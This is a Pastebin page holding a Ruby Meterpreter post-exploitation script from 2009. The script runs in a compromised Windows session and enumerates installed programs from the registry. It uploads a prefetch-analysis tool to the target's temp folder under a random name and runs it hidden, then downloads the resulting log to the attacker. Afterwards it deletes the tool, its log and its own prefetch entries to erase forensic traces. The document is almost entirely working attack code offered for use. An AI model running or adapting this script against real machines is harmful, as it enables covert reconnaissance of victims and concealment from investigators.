G2A Many GEOs
SHARE
TWEET

milo

a guest Oct 22nd, 2009 374 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env ruby
  2. #Meterpreter script for extracting information from windows prefetch folder
  3. #Provided by Milo at keith.lee2012[at]gmail.com
  4. #Verion: 0.1.0
  5. session = client
  6. host,port = session.tunnel_peer.split(':')
  7.  
  8. # Script Options
  9. exec_opts = Rex::Parser::Arguments.new(
  10.         "-h" => [ false,  "Help menu."],
  11.                 "-p" => [ false,  "List Installed Programs"],                
  12.                 "-c" => [ false,  "Disable SHA1/MD5 checksum"],                
  13.                 "-x" => [ true,   "Top x Accessed Executables (Based on Prefetch folder)"],                
  14.                 "-d" => [ false,  "Disable lookup for software name"],
  15.                 "-l" => [ false,  "Download Prefetch Folder Analysis Log"]
  16.                 )
  17. tmp = session.fs.file.expand_path("%TEMP%")
  18. imgname = sprintf("%.5d",rand(100000))
  19. runTop = nil
  20. logs = ''
  21. logs1 = ''
  22.  
  23. timeoutsec = 1000
  24. #---------------------------------------------------------------------------------------------------------
  25. def readprogramlist(session)
  26.         begin
  27.         key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
  28.         sfmsvals = key.enum_key
  29.         sfmsvals.each do |test1|
  30.                 begin                  
  31.                         key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
  32.                         root_key2, base_key2 = session.sys.registry.splitkey(key2)
  33.                         value1 = "DisplayName"
  34.                         value2 = "DisplayVersion"
  35.                         open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
  36.                         v1 = open_key.query_value(value1)
  37.                         v2 = open_key.query_value(value2)
  38.                         print_status("#{v1.data}\t(Version:  #{v2.data})")
  39.                 rescue
  40.                 end
  41.         end
  42.         end
  43. end
  44.  
  45. def prefetchdump(session,tmp,imgname,options,logs1,timeoutsec)
  46.         tmpout = []
  47.         prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
  48.         prefetchlog = sprintf("%.5d",rand(100000))
  49.         print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
  50.         begin
  51.                 session.fs.file.upload_file("#{tmp}\\#{prefetchlog}.exe","#{prefetchexe}")
  52.                 print_status("Prefetch-tool uploaded as #{tmp}\\#{prefetchlog}.exe")
  53.         rescue::Exception => e
  54.                         print_status("The following Error was encountered: #{e.class} #{e}")
  55.         end
  56.         session.response_timeout=timeoutsec
  57.         if logs1!=''
  58.                 session = client
  59.                 host,port = session.tunnel_peer.split(':')
  60.                 logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
  61.                 ::FileUtils.mkdir_p(logs)
  62.                 print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
  63.         end
  64.  
  65.         begin
  66.                 r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{prefetchlog}.exe #{options} #{logs1}.txt", nil, {'Hidden' => 'true','Channelized' => true})
  67.                 while(d = r.channel.read)
  68.                         print_status d
  69.                 end
  70.                 sleep(2)
  71.                 prog2check = "#{prefetchlog}.exe"
  72.                 found = 0
  73.                 while found == 0
  74.                         session.sys.process.get_processes().each do |x|
  75.                                 found =1
  76.                                 if prog2check == (x['name'].downcase)
  77.                                         print "."
  78.                                         sleep(0.5)
  79.                                         found = 0
  80.                                 end
  81.                         end
  82.                 end
  83.                 r.channel.close
  84.                 r.close
  85.                 print "\n"
  86.                 if logs1!=""
  87.                         print_status("Finish extracting prefetch folder data")
  88.                 end
  89.                 print_status("Deleting #{prefetchlog}.exe from target...")
  90.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{prefetchlog}.exe", nil, {'Hidden' => 'true'})
  91.                 session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
  92.                 print_status("Clearing prefetch-tool prefetch entry ...")
  93.         rescue::Exception => e
  94.                         print_status("The following error was encountered: #{e.class} #{e}")
  95.         end
  96.         return logs
  97. end
  98. #---------------------------------------------------------------------------------------------------------
  99. def logdown(session,tmp,imgname,logs,timeoutsec)
  100.         session.response_timeout=timeoutsec
  101.         print_status("Downloading prefetch-tool logs to #{logs}")
  102.         begin
  103.                 session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
  104.                 print_status("Finished downloading prefetch-tool log")
  105.                 print_status("Deleting left over files...")
  106.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
  107.                 print_status("Prefetch-tool log on target deleted")
  108.         rescue::Exception => e
  109.                         print_status("The following Error was encountered: #{e.class} #{e}")
  110.         end
  111. end
  112.  
  113. ################## MAIN ##################
  114. # Parsing of Option
  115. checksum = 1
  116. inetlookup = 1
  117. hlp = 0
  118. dwld = 0
  119. options1 = ""
  120. viewPrograms = 0
  121.  
  122. exec_opts.parse(args) { |opt, idx, val|
  123.         case opt
  124.         when "-x"
  125.                 options1 += " --x="+val
  126.         when "-c"
  127.                 options1 += " --disable-md5 --disable-sha1"
  128.         when "-p"
  129.                 viewPrograms = 1       
  130.                 hlp = 1
  131.         when "-d"
  132.                 options1 += " --disable-lookup"
  133.         when "-l"
  134.                 logs1 = " --txt=#{tmp}\\#{imgname}"
  135.                 dwld = 1
  136.         when "-h"
  137.                 hlp = 1
  138.                 print(
  139.                 "Prefetch-tool Meterpreter Script\n" +
  140.                 @@exec_opts.usage                      
  141.                 )
  142.                 break
  143.         end
  144. }
  145. if (viewPrograms == 1)
  146.         readprogramlist(session)
  147. end
  148.  
  149. if (hlp == 0)
  150.         print_status("Running Prefetch-tool Script.....")
  151.         logs2 = prefetchdump(session,tmp,imgname,options1,logs1,timeoutsec)
  152.         if (dwld == 1)
  153.                 logdown(session,tmp,imgname,logs2,timeoutsec)
  154.         end
  155. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top